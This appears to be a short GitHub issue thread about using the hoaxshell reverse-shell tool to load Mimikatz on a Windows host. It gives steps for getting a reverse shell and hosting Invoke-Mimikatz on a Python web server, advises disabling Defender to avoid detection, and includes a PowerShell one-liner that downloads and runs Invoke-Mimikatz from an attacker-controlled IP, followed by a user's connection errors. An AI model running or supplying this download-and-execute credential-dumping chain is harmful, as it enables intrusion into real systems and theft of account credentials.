Closed techstartupexplorer closed 2 years ago
Here's how it's done:
Start hoaxshell and get a reverse shell.
Start a python http server on the directory you have saved mimikatz:
Execute invoke mimikatz web request through the hoaxshell session:
You should first try this with defender disabled because there's a very high chance mimikatz will get caught.
PS C:\Users\Administrsator>powershell IEX(New-Object Net.WebClient).DownloadString('https://MyIP/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'
Not working. Error below. With either port 443 or 4443, it's not working. I downloaded the mimikatz ps1 file into the same folder as hoaxshell.py.
Payload is using SSL.
Note: I replaced my IP with "myip" to hide my IP.
Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:1
Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:108